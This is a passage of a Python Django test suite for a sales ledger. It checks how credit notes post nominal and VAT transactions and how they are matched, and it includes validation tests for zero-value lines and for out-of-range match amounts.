self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'g'
)
for i, tran in enumerate(total_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.value,
-100
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
't'
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
# CORRECT USAGE
# VAT only invoice
# I.e. goods = 0 and vat = 20 on each analysis line
def test_vat_only_lines_invoice(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
matching_data = create_formset_data(match_form_prefix, [])
line_forms = ([{
'description': self.description,
'goods': 0,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 20
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all()
self.assertEqual(len(headers), 1)
header = headers[0]
self.assertEqual(
header.total,
-20 * (0 + 20)
)
self.assertEqual(
header.goods,
0 * 100
)
self.assertEqual(
header.vat,
-20 * 20
)
self.assertEqual(
header.ref,
self.ref
)
self.assertEqual(
header.paid,
0
)
self.assertEqual(
header.due,
header.total
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20
# i.e. 0 nominal entries for each goods value
# 20 nominal entries for each vat value
# 20 nominal entry for each goods + vat value
)
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
for i, line in enumerate(lines):
self.assertEqual(
line.line_no,
i + 1
)
self.assertEqual(
line.description,
self.description
)
self.assertEqual(
line.goods,
0
)
self.assertEqual(
line.nominal,
self.nominal
)
self.assertEqual(
line.vat_code,
self.vat_code
)
self.assertEqual(
line.vat,
-20
)
self.assertEqual(
line.goods_nominal_transaction,
None
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[(2 * i) + 0]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[(2 * i) + 1]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
vat_trans = nom_trans[::2]
total_trans = nom_trans[1::2]
for i, tran in enumerate(vat_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'v'
)
for i, tran in enumerate(total_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.value,
-20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
't'
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
# CORRECT USAGE
# Zero value invoice
# So analysis must cancel out
# A zero value transaction is only permissable if we are matching -- a good check in the system
def test_zero_invoice_with_analysis(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
headers_to_match_against = create_cancelling_headers(
2, self.customer, "match", "si", 100, self.period)
headers_to_match_against_orig = headers_to_match_against
headers_as_dicts = [to_dict(header)
for header in headers_to_match_against]
headers_to_match_against = [get_fields(
header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {
"id": "matched_to"}, {"value": 100})
matching_forms += add_and_replace_objects([headers_to_match_against[1]], {
"id": "matched_to"}, {"value": -100})
matching_data = create_formset_data(
match_form_prefix, matching_forms)
line_forms = ([{
'description': self.description,
'goods': 20,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': -20
}]) * 10
line_forms += (
[{
'description': self.description,
'goods': -20,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': +20
}] * 10
)
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all()
self.assertEqual(len(headers), 3)
header = headers[0]
self.assertEqual(
header.total,
0
)
self.assertEqual(
header.goods,
0
)
self.assertEqual(
header.vat,
0
)
self.assertEqual(
header.ref,
self.ref
)
self.assertEqual(
header.paid,
0
)
self.assertEqual(
header.due,
header.total
)
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
lines_orig = lines
lines = lines_orig[:10]
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
40
# i.e. 20 nominal trans for goods
# i.e. 20 nominal trans for vat
# no nominal control account nominal entry because would be zero value -- WHAT THE WHOLE TEST IS ABOUT !!!
)
# assuming the lines are created in the same order
# as the nominal entries....
for i, line in enumerate(lines):
self.assertEqual(
line.line_no,
i + 1
)
self.assertEqual(
line.description,
self.description
)
self.assertEqual(
line.goods,
-20
)
self.assertEqual(
line.nominal,
self.nominal
)
self.assertEqual(
line.vat_code,
self.vat_code
)
self.assertEqual(
line.vat,
20
)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[(2 * i) + 0]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[(2 * i) + 1]
)
self.assertEqual(
line.total_nominal_transaction,
None
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
lines = lines_orig[10:]
for i, line in enumerate(lines, 10):
self.assertEqual(
line.line_no,
i + 1
)
self.assertEqual(
line.description,
self.description
)
self.assertEqual(
line.goods,
20
)
self.assertEqual(
line.nominal,
self.nominal
)
self.assertEqual(
line.vat_code,
self.vat_code
)
self.assertEqual(
line.vat,
-20
)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[(2 * i) + 0]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[(2 * i) + 1]
)
self.assertEqual(
line.total_nominal_transaction,
None
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
2
)
self.assertEqual(
matches[0].matched_by,
header
)
self.assertEqual(
matches[0].matched_to,
headers[1]
)
self.assertEqual(
matches[0].value,
100
)
goods_and_vat_nom_trans = nom_trans[:40]
positive_goods_trans = goods_and_vat_nom_trans[:20:2]
negative_vat_trans = goods_and_vat_nom_trans[1:20:2]
negative_goods_trans = goods_and_vat_nom_trans[20::2]
positive_vat_trans = goods_and_vat_nom_trans[21::2]
lines = lines_orig[:10]
for i, tran in enumerate(positive_goods_trans):
self.assertEqual(
lines[i].goods_nominal_transaction,
tran
)
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'g'
)
lines = lines_orig[:10]
for i, tran in enumerate(negative_vat_trans):
self.assertEqual(
lines[i].vat_nominal_transaction,
tran
)
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.value,
-20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'v'
)
lines = lines_orig[10:]
for i, tran in enumerate(negative_goods_trans):
self.assertEqual(
lines[i].goods_nominal_transaction,
tran
)
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.value,
-20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'g'
)
lines = lines_orig[10:]
for i, tran in enumerate(positive_vat_trans):
self.assertEqual(
lines[i].vat_nominal_transaction,
tran
)
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'v'
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
lines = lines_orig
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
# CORRECT USAGE
# Zero value invoice again but this time with no lines
# A zero value transaction is only permissable if we are matching -- a good check in the system
def test_zero_invoice_with_no_analysis(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
headers_to_match_against = create_cancelling_headers(
2, self.customer, "match", "si", 100, self.period)
headers_to_match_against_orig = headers_to_match_against
headers_as_dicts = [to_dict(header)
for header in headers_to_match_against]
headers_to_match_against = [get_fields(
header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {
"id": "matched_to"}, {"value": 100})
matching_forms += add_and_replace_objects([headers_to_match_against[1]], {
"id": "matched_to"}, {"value": -100})
matching_data = create_formset_data(
match_form_prefix, matching_forms)
line_data = create_formset_data(LINE_FORM_PREFIX, [])
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all()
self.assertEqual(len(headers), 3)
header = headers[0]
self.assertEqual(
header.total,
0
)
self.assertEqual(
header.goods,
0
)
self.assertEqual(
header.vat,
0
)
self.assertEqual(
header.ref,
self.ref
)
self.assertEqual(
header.paid,
0
)
self.assertEqual(
header.due,
header.total
)
lines = SaleLine.objects.all()
self.assertEqual(
len(lines),
0
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
0
# i.e. 20 nominal trans for goods
# i.e. 20 nominal trans for vat
# no nominal control account nominal entry because would be zero value -- WHAT THE WHOLE TEST IS ABOUT !!!
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
2
)
self.assertEqual(
matches[0].matched_by,
header
)
self.assertEqual(
matches[0].matched_to,
headers[1]
)
self.assertEqual(
matches[0].value,
100
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
0
)
# INCORRECT USAGE
# No point allowing lines which have no goods or vat
def test_zero_invoice_with_line_but_goods_and_zero_are_both_zero(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
headers_to_match_against = create_cancelling_headers(
2, self.customer, "match", "si", 100, self.period)
headers_to_match_against_orig = headers_to_match_against
headers_as_dicts = [to_dict(header)
for header in headers_to_match_against]
headers_to_match_against = [get_fields(
header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {
"id": "matched_to"}, {"value": 100})
matching_forms += add_and_replace_objects([headers_to_match_against[1]], {
"id": "matched_to"}, {"value": -100})
matching_data = create_formset_data(
match_form_prefix, matching_forms)
line_forms = ([{
'description': self.description,
'goods': 0,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 0
}])
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 200)
self.assertContains(
response,
'<li class="py-1">Goods and Vat cannot both be zero.</li>',
html=True
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
0
)
"""
Test matching positive invoices now
"""
# CORRECT USAGE
def test_fully_matching_an_invoice(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
receipt = create_receipts(self.customer, "receipt", 1, self.period, -2400)[0]
headers_as_dicts = [to_dict(receipt)]
headers_to_match_against = [get_fields(
header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {
"id": "matched_to"}, {"value": -2400})
matching_data = create_formset_data(
match_form_prefix, matching_forms)
line_forms = ([{
'description': self.description,
'goods': 100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 20
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(len(headers), 2)
receipt = headers[0]
header = headers[1]
self.assertEqual(
header.total,
-20 * (100 + 20)
)
self.assertEqual(
header.goods,
-20 * 100
)
self.assertEqual(
header.vat,
-20 * 20
)
self.assertEqual(
header.ref,
self.ref
)
self.assertEqual(
header.paid,
-2400
)
self.assertEqual(
header.due,
0
)
self.assertEqual(
receipt.total,
2400
)
self.assertEqual(
receipt.paid,
2400
)
self.assertEqual(
receipt.due,
0
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20 + 20
# i.e. 20 nominal entries for each goods value
# 20 nominal entries for each vat value
# 20 nominal entries for each goods + vat value
)
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
for i, line in enumerate(lines):
self.assertEqual(
line.line_no,
i + 1
)
self.assertEqual(
line.description,
self.description
)
self.assertEqual(
line.goods,
-100
)
self.assertEqual(
line.nominal,
self.nominal
)
self.assertEqual(
line.vat_code,
self.vat_code
)
self.assertEqual(
line.vat,
-20
)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[(3 * i) + 0]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[(3 * i) + 1]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[(3 * i) + 2]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_trans = nom_trans[::3]
vat_trans = nom_trans[1::3]
total_trans = nom_trans[2::3]
for i, tran in enumerate(goods_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'g'
)
for i, tran in enumerate(vat_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'v'
)
for i, tran in enumerate(total_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.value,
-100 + -20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
't'
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
1
)
self.assertEqual(
matches[0].matched_by,
header
)
self.assertEqual(
matches[0].matched_to,
headers[0] # receipt created first before invoice
)
self.assertEqual(
matches[0].value,
2400
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
# CORRECT USAGE
def test_selecting_a_transaction_to_match_but_for_zero_value(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
receipt = create_receipts(self.customer, "receipt", 1, self.period, -2400)[0]
headers_as_dicts = [to_dict(receipt)]
headers_to_match_against = [get_fields(
header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {
"id": "matched_to"}, {"value": 0})
matching_data = create_formset_data(
match_form_prefix, matching_forms)
line_forms = ([{
'description': self.description,
'goods': 100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 20
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(len(headers), 2)
receipt = headers[0]
header = headers[1]
self.assertEqual(
header.total,
-20 * (100 + 20)
)
self.assertEqual(
header.goods,
-20 * 100
)
self.assertEqual(
header.vat,
-20 * 20
)
self.assertEqual(
header.ref,
self.ref
)
self.assertEqual(
header.paid,
0
)
self.assertEqual(
header.due,
-2400
)
self.assertEqual(
receipt.total,
2400
)
self.assertEqual(
receipt.paid,
0
)
self.assertEqual(
receipt.due,
2400
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20 + 20
# i.e. 20 nominal entries for each goods value
# 20 nominal entries for each vat value
# 20 nominal entries for each goods + vat value
)
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
for i, line in enumerate(lines):
self.assertEqual(
line.line_no,
i + 1
)
self.assertEqual(
line.description,
self.description
)
self.assertEqual(
line.goods,
-100
)
self.assertEqual(
line.nominal,
self.nominal
)
self.assertEqual(
line.vat_code,
self.vat_code
)
self.assertEqual(
line.vat,
-20
)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[(3 * i) + 0]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[(3 * i) + 1]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[(3 * i) + 2]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_trans = nom_trans[::3]
vat_trans = nom_trans[1::3]
total_trans = nom_trans[2::3]
for i, tran in enumerate(goods_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'g'
)
for i, tran in enumerate(vat_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'v'
)
for i, tran in enumerate(total_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.value,
-100 + -20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
't'
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
# INCORRECT USAGE
# For an credit of 2400 the match value must be between 0 and 2400
def test_match_total_greater_than_zero(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
invoice_to_match = create_invoices(
self.customer, "invoice to match", 1, self.period, -2000)[0]
headers_as_dicts = [to_dict(invoice_to_match)]
headers_to_match_against = [get_fields(
header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {
"id": "matched_to"}, {"value": -0.01})
matching_data = create_formset_data(
match_form_prefix, matching_forms)
line_forms = ([{
'description': self.description,
'goods': 100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 20
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 200)
self.assertContains(
response,
'<li class="py-1">Please ensure the total of the transactions you are matching is between 0 and 2400.00</li>',
html=True
)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(len(headers), 1)
invoice_to_match = headers[0]
self.assertEqual(
invoice_to_match.total,
-2400
)
self.assertEqual(
invoice_to_match.paid,
0
)
self.assertEqual(
invoice_to_match.due,
-2400
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
0
# i.e. 20 nominal entries for each goods value
# 20 nominal entries for each vat value
# 20 nominal entries for each goods + vat value
)
lines = SaleLine.objects.all()
self.assertEqual(len(lines), 0)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
0
)
# INCORRECT USAGE
# Try and match -2400.01 to an invoice for 2400
def test_match_total_less_than_invoice_total(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
receipt = create_receipts(
self.customer, "invoice to match", 1, self.period, -2500)[0]
headers_as_dicts = [to_dict(receipt)]
headers_to_match_against = [get_fields(
header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {
"id": "matched_to"}, {"value": -2400.01})
matching_data = create_formset_data(
match_form_prefix, matching_forms)
line_forms = ([{
'description': self.description,
'goods': 100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 20
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 200)
self.assertContains(
response,
'<li class="py-1">Please ensure the total of the transactions you are matching is between 0 and 2400.00</li>',
html=True
)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(len(headers), 1)
receipt = headers[0]
self.assertEqual(
receipt.total,
2500
)
self.assertEqual(
receipt.paid,
